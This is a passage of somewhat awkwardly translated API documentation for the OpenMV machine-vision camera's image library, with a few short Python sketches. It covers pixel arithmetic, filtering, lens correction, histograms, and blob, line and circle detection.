pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe two images are subtracted from each other by pixel.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nSet reverse to True to reverse the subtraction from this_image-image to image-this_image .\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nMultiply two images by pixel by pixel.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nSetting invert to True changes the multiplication operation from ab to 1/((1/a)(1/b)). In particular, this brightens the image rather than darkening the image (eg, multiply and burn operations).\n\nMask is another image that is used as a pixel-level mask for drawing operations. 
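The pixel-arithmetic methods above are often combined for simple frame differencing. A rough sketch follows, using image.copy() for the reference frame and the absolute-difference method documented a little further below; the very small frame size is chosen so the heap copy stays within the documented limits.

```python
# Sketch: background subtraction by per-pixel absolute difference.
import sensor, time

sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQQVGA)       # 80x60 so the copy fits on the heap
sensor.skip_frames(time=2000)

background = sensor.snapshot().copy()     # heap copy of the reference frame

while True:
    img = sensor.snapshot()
    img.difference(background)            # abs(img - background), per pixel
```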
The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nDivide this image by another image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nSet invert to True to change the division direction from a/b to b/a.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nAt the pixel level, replace the pixels in this image with the smallest pixel value between this image and another image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nThe mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV4.\n\nReplace pixels in this image at the pixel level with the maximum pixel value between this image and another image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe two images are taken to each other in absolute values. Example: For each color channel, replace each pixel with ABS (this.pixel-image.pixel).\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nMask is another image used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . 
notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nCombine another image image with this image.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nAlpha controls how much other images are to be blended into this image. alpha should be an integer value between 0 and 256. A value close to zero will mix more images into this image, and close to 256 is the opposite.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nRun a histogram equalization algorithm on the image. Histogram equalization normalizes contrast and brightness in the image.\n\nIf adaptive passes to True, the adaptive histogram equalization method will be run on the image, which is usually better than the non-adaptive histogram qualification, but runs longer.\n\nClip_limit provides a way to limit the contrast of adaptive histogram equalization. A good histogram equalization contrast limited image can be generated using a small value (eg 10).\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### image.mean(size, [threshold=False, [offset=0, [invert=False, [mask=None]]]]])\n\nStandard mean blur filtering using a box filter.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nMedian(size, percentile=0.5, threshold=False, offset=0, invert=False, mask]) Run median filtering on the image. Median filtering is the best filtering to smooth the surface, but at very slow speeds, while preserving the edges.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nPercentile Controls the percentile of the values ​​used in the kernel. By default, each pixel is replaced with an adjacent fiftyth percentile (center). 
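A minimal sketch of the smoothing filters just described (the kernel sizes are arbitrary, and median filtering is noticeably slower than the box blur):

```python
# Sketch: box blur followed by an edge-preserving median filter.
import sensor, time

sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA)
sensor.skip_frames(time=2000)

while True:
    img = sensor.snapshot()
    img.mean(1)                       # 3x3 box blur
    img.median(1, percentile=0.5)     # 3x3 median (0.5 = classic median)
```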
You can set this value to 0 when using minimum filtering, to 0.25 for lower quartile filtering, to 0.75 for upper quartile filtering, and to 1 for maximum filtering.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.mode(size[, threshold=False, offset=0, invert=False, mask])\n\nRun a majority filter on the image, replacing each pixel with the pattern of adjacent pixels. This method works well on grayscale images. However, due to the non-linear nature of this operation, many artifacts are produced on the edges of the RGB image.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core).\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.midpoint(size[, bias=0.5, threshold=False, offset=0, invert=False, mask])\n\nRun midpoint filtering on the image. This filter finds the midpoint of the neighborhood of each pixel in the image ((max-min)/2).\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nBias Controls the minimum/maximum degree of image blending. 0 is only for minimum filtering and 1 is for maximum filtering only. You can minimize/maximize filtering of images with bias.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. 
Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nThe image is convolved through the filter kernel. This allows you to perform a general convolution on the image.\n\nSize Controls the size of the kernel to ((size2)+1)x((size2)+1) pixels.\n\nKernel The kernel used to convolve the image, either as a tuple or as a list of values ​​[-128:127].\n\nMul is the number used to multiply the result of the convolutional pixel. If not set, it defaults to a value that will prevent scaling in the convolution output.\n\nAdd is the number used to add the convolution result to each pixel.\n\nMul can be used for global contrast adjustment, and add can be used for global brightness adjustment.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThe image is convolved by a smooth Gaussian kernel.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nIf unsharp is set to True, this method does not perform Gaussian filtering only, but performs an unsharp masking operation to improve the image sharpness of the edges.\n\nMul is the number used to multiply the result of the convolutional pixel. If not set, it defaults to a value that will prevent scaling in the convolution output.\n\nAdd is the number used to add the convolution result to each pixel.\n\nMul can be used for global contrast adjustment, and add can be used for global brightness adjustment.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nThe image is convolved by edge detection of the Laplacian kernel.\n\nSize is the size of the kernel. 
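As a sketch of the two convolution methods above: their headings are missing from the text, so the names image.morph() and image.gaussian() below are taken from the OpenMV API as an assumption, and the sharpening kernel is arbitrary.

```python
# Sketch: Gaussian smoothing followed by a 3x3 sharpening convolution.
import sensor, time

sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA)
sensor.skip_frames(time=2000)

sharpen = [-1, -1, -1,
           -1,  9, -1,
           -1, -1, -1]          # high-pass kernel; coefficients sum to 1

while True:
    img = sensor.snapshot()
    img.gaussian(1)              # 3x3 Gaussian blur
    img.morph(1, sharpen)        # general convolution with the kernel above
```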
Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nIf sharpen is set to True, this method will instead sharpen the image instead of just outputting edge-detected images that have not been thresholded. Increase the kernel size and increase the image clarity.\n\nMul is the number used to multiply the result of the convolutional pixel. If not set, it defaults to a value that will prevent scaling in the convolution output.\n\nAdd is the number used to add the convolution result to each pixel.\n\nMul can be used for global contrast adjustment, and add can be used for global brightness adjustment.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.bilateral(size[, color_sigma=0.1[, space_sigma=1[, threshold=False[, offset=0[, invert=False[, mask=None]]]]])\n\nThe image is convolved by a bilateral filter. A bilateral filter smoothes the image while maintaining the edges in the image.\n\nSize is the size of the kernel. Take 1 (3x3 core), 2 (5x5 core) or higher.\n\nThe color_sigma control uses a bilateral filter to match the proximity of the color. Increasing this value increases the color blur.\n\nSpace_sigma controls the degree to which pixels are blurred in space. Increasing this value increases pixel blur.\n\nIf you want to adaptively set the threshold on the output of the filter, you can pass the threshold=True parameter to initiate adaptive threshold processing of the image, which is based on the brightness of the ambient pixel (the brightness of the pixels around the kernel function). Set to 1 or 0. A negative offset value sets more pixels to 1, while a positive value only sets the strongest contrast to 1. Set invert to invert the result output of the binary image.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nRoam the image and fill all the pixel areas in the image using the flood-fills algorithm. This effectively removes texture from the image by flattening the colors in all areas of the image. 
For best results, the image should have a lot of contrast so that the areas don't penetrate too easily.\n\nSeed_threshold Controls the difference between the pixels in the fill area and the original start pixel.\n\nFloating_threshold Controls the difference between pixels in the fill area and any adjacent pixels.\n\nMask is another image that is used as a pixel-level mask for drawing operations. The mask should be an image with only black or white pixels and should be the same size as the image you are drawing. Only the pixels set in the mask are modified.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nRemove the shadow from the image.\n\nIf the current image does not have a \"shadowless\" version, this method will attempt to remove the shadow from the image, but there is no true unshaded image basis. This algorithm is suitable for removing shadows in a flat, uniform background. Note that this method takes many seconds to run and is only suitable for removing shadows in real time, dynamically generating an unshadowed version of the image. Future versions of the algorithm will work for more environments, but equally slow.\n\nIf the current image has a \"shadowless\" version, this method will remove all shadows in the image using the \"true source\" background unshadowed image to filter out the shadows. Non-shaded pixels are not filtered out, so you can add new objects that didn't exist before to the scene, and any non-shaded pixels in those objects will be displayed.\n\nReturns an image object so that you can use the . notation to call another method.\n\nOnly RGB565 images are supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.chrominvar()\n\nRemove the lighting effect from the image, leaving only the color gradient. Faster than image.illuminvar() but affected by shadows.\n\nReturns an image object so that you can use the . notation to call another method.\n\nOnly RGB565 images are supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.illuminvar()\n\nRemove the lighting effect from the image, leaving only the color gradient. Slower than image.chrominvar() but not affected by shadows.\n\nReturns an image object so that you can use the . notation to call another method.\n\nOnly RGB565 images are supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.linpolar([reverse=False])\n\nThe image is re-projected from Cartesian coordinates to linear polar coordinates.\n\nSet reverse = True to re-project in the opposite direction.\n\nLinear polar re-projection converts image rotation to x translation.\n\nCompressed images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.logpolar([reverse=False])\n\nThe image is re-projected from Cartesian coordinates to log polar coordinates.\n\nSet reverse = True to re-project in the opposite direction.\n\nLog-polar polar re-projection converts the rotation of the image to x translation and zoom to y translation.\n\nCompressed images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.lens_corr([strength=1.8[, zoom=1.0]])\n\nPerform lens distortion correction to remove the fisheye effect caused by the lens.\n\nStrength is a floating point number that determines how much the fisheye effect is applied to the image. 
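For instance, a minimal un-distortion loop using the call above (the strength value is only a starting point to tune, as the next paragraph explains):

```python
# Sketch: correct fisheye distortion on every frame.
import sensor, time

sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA)
sensor.skip_frames(time=2000)

while True:
    img = sensor.snapshot()
    img.lens_corr(strength=1.8, zoom=1.0)   # adjust strength until lines look straight
```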
By default, try the value of 1.8 first, then adjust this value to make the image show the best results.\n\nZoom is the value at which the image is scaled. The default is 1.0.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\n#### img.rotation_corr([x_rotation=0.0[, y_rotation=0.0[, z_rotation=0.0[, x_translation=0.0[, y_translation=0.0[, zoom=1.0]]]]])\n\nThe perspective problem in the image is corrected by performing a 3D rotation of the frame buffer.\n\nX_rotation is the degree to which the image is rotated in the frame buffer around the x-axis (this causes the image to rotate up and down).\n\nY_rotation is the degree of rotation of the image around the y-axis in the frame buffer (ie, the image is rotated left and right).\n\nZ_rotation is the degree by which the image is rotated in the frame buffer around the z-axis (ie, the image is rotated to the appropriate position).\n\nX_translation is the number of units that move the image to the left or right after rotation. Because this transformation is applied in 3D space, the unit is not a pixel...\n\nY_translation is the number of units that move the image up or down after rotation. Because this transformation is applied in 3D space, the unit is not a pixel...\n\nZoom is the amount that is scaled by the image. By default 1.0.\n\nReturns an image object so that you can use the . notation to call another method.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.get_similarity(image)\n\nReturns a \"similarity\" object describing the two images using the SSIM algorithm to compare the similarities of 8x8 pixel patches between the two images.\n\nImage can be an image object, the path to an uncompressed image file (bmp/pgm/ppm), or a scalar value. If a scalar value, the value can be an RGB888 tuple or a base pixel value (eg, an 8-bit grayscale of a grayscale image or a byte-inverted RGB565 value of an RGB image).\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.get_histogram([thresholds[, invert=False[, roi[, bins[, l_bins[, a_bins[, b_bins]]]]]])\n\nNormalize histogram operations on all color channels of roi and return histogram objects. Please refer to the histogram object for more information. You can also call this method using image.get_hist or image.histogram . If you pass the thresholds list, the histogram information will only be calculated from the pixels in the threshold list.\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nannotation\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracking object in the IDE framebuffer. 
The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nUnless you need to use color statistics for advanced operations, simply use the `image.get_statistics()` method instead of this method to see the pixel areas in the image.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nBins and other bins are the number of bins used for the histogram channel. For grayscale images, use bins, for RGB565 images, use each of the other channels. The bin count for each channel must be greater than 2. In addition, it makes no sense to set the bin count to a number greater than the unique pixel value of each channel. By default, the histogram will have the maximum number of bins per channel.\n\nCompressed images and bayer images are not supported.\n\n#### image.get_statistics([thresholds[, invert=False[, roi[, bins[, l_bins[, a_bins[, b_bins]]]]]])\n\nCalculates the average, median, value, standard deviation, minimum, maximum, lower quartile, and upper quartile for each color channel in roi and returns a data object. See the statistics object for more information. You can also call this method using image.get_stats or image.statistics . If you pass the thresholds list, the histogram information will only be calculated from the pixels in the threshold list.\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nannotation\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracking object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. 
Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nYou can use this method when you need to get a pixel area information in an image. For example, if you want to use the frame difference method to detect motion, you need to use this method to determine the change in the color channel of the image, which triggers the motion detection threshold.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nBins and other bins are the number of bins used for the histogram channel. For grayscale images, use bins, for RGB565 images, use each of the other channels. The bin count for each channel must be greater than 2. In addition, it makes no sense to set the bin count to a number greater than the unique pixel value of each channel. By default, the histogram will have the maximum number of bins per channel.\n\nCompressed images and bayer images are not supported.\n\n#### image.get_regression(thresholds[, invert=False[, roi[, x_stride=2[, y_stride=1[, area_threshold=10[, pixels_threshold=10[, robust=False]]]]]])\n\nPerform linear regression calculations on all threshold pixels of the image. This calculation is done by least squares, which is usually faster, but does not handle any outliers. If robust is True, the Theil index will be used. The Theil index calculates the median of all slopes between all threshold pixels in the image. If you set too many pixels after the threshold transition, even on an 80x60 image, this N^2 operation may lower your FPS below 5. However, as long as the number of pixels to be set after the threshold conversion is small, linear regression is effective even when the threshold pixel exceeding 30% is an abnormal value.\n\nThis method returns an image.line object. How to easily use straight line objects, see the following blog post: https://openmv.io/blogs/news/linear-regression-line-following\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracked object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. 
Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nX_stride is the number of x pixels to skip when calling a function.\n\nY_stride is the number of y pixels to skip when calling a function.\n\nReturns None if the bounding box area after the regression is smaller than area_threshold .\n\nReturns None if the number of pixels after regression is less than pixel_threshold .\n\nCompressed images and bayer images are not supported.\n\n#### image.find_blobs(thresholds[, invert=False[, roi[, x_stride=2[, y_stride=1[, area_threshold=10[, pixels_threshold=10[, merge=False[, margin=0[, threshold_cb =None[, merge_cb=None]]]]]]]]]]])\n\nFinds all the patches in the image and returns a list of patch objects that include each patch. Please observe the image.blob object for more information.\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nannotation\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracking object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nX_stride is the number of x pixels that need to be skipped when looking for a patch. Once the color block is found, the line fill algorithm will be precise pixels. If the color block is known to be large, increase x_stride to increase the speed at which the color block is found.\n\nY_stride is the number of y pixels that need to be skipped when looking for a patch. Once the color block is found, the line fill algorithm will be precise pixels. 
If the color block is known to be large, increase y_stride to increase the speed at which the patch is found.\n\nIf the bounding box area of ​​a patch is smaller than area_threshold, it will be filtered out.\n\nIf the number of pixels in a patch is smaller than pixel_threshold, it will be filtered out.\n\nMerge If True, merges all the patches that have not been filtered. The border rectangles of these patches overlap each other. Margin can be used in the intersection test to increase or decrease the size of the patch boundary rectangle. For example, patches with edges of 1 and border rectangles of 1 will be merged.\n\nMerging patches allows color code tracking to be achieved. Each patch object has a code value code , which is a bit vector. For example, if you enter two color thresholds in image.find_blobs, the first threshold code is 1 and the second code is 2 (the third code is 4, the fourth code is 8, and so on). Merged patches use logical OR operations on all code so you know the color that produced them. This allows you to track two colors, and if you get a patch object in two colors, it might be a color code.\n\nIf you use a strict color range and cannot fully track all the pixels of the target object, you may need to merge the patches.\n\nFinally, if you want to merge the patches, but don't want the two different threshold colors to be merged, just call image.find_blobs twice, and the different threshold patches will not be merged.\n\nThe threshold_cb can be set to a function that calls each color block after threshold filtering to filter it out of the list of patches to be merged. The callback function will receive a parameter: the patch object to be filtered. The callback function then returns True to preserve the color block or return False to filter the color block.\n\nMerge_cb can be set to function to call two patches to be merged to disable or permit the merge. The callback function will receive two arguments - two patch objects that will be merged. The callback function must return True to merge the color blocks, or return False to prevent color block merging.\n\nCompressed images and bayer images are not supported.\n\n#### image.find_lines([roi[, x_stride=2[, y_stride=1[, threshold=1000[, theta_margin=25[, rho_margin=25]]]]])\n\nUse the Hough transform to find all the lines in the image. Returns a list of image.line objects.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nX_stride is the number of x pixels that need to be skipped during the Hough transform. If the line is known to be large, increase x_stride.\n\nY_stride is the number of y pixels that need to be skipped during the Hough transform. If the line is known to be large, increase y_stride.\n\nThreshold Controls the line that is detected from the Hough transform. Only return lines that are greater than or equal to threshold. The correct threshold value for the application depends on the image. Note: The magnitude of a line is the sum of the size of all Sobel filter pixels that make up the line.\n\nTheta_margin controls the merging of the lines being monitored. The part of the line angle of theta_margin is merged with the part of the line p value of rho_margin.\n\nRho_margin controls the merging of the lines being monitored. 
The part of the line angle of theta_margin is merged with the part of the line p value of rho_margin.\n\nThe method performs a Hough transform by running a Sobel filter on the image and using the amplitude and gradient response of the filter. No pre-processing of the image is required. However, cleaning up the image filter results in more stable results.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_line_segments([roi[, merge_distance=0[, max_theta_difference=15]]])\n\nUse Hough transform to find line segments in the image. Returns a list of image.line objects.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle. The operating range is limited to pixels in the roi area.\n\nMerge_distance specifies the maximum number of pixels between two segments that can be separated from each other without being merged.\n\nMax_theta_difference is the maximum angle difference between the two line segments that merge_distancede will merge above.\n\nThis method uses the LSD library (also used by OpenCV) to find line segments in the image. This is a bit slow, but very accurate, the line segments won't jump.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_circles([roi[, x_stride=2[, y_stride=1[, threshold=2000[, x_margin=10[, y_margin=10[, r_margin=10]]]]]])\n\nUse the Hough transform to find a circle in the image. Returns a list of image.circle objects (see above).\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle. The operating range is limited to pixels in the roi area.\n\nX_stride is the number of x pixels that need to be skipped during the Hough transform. If the circle is known to be large, increase 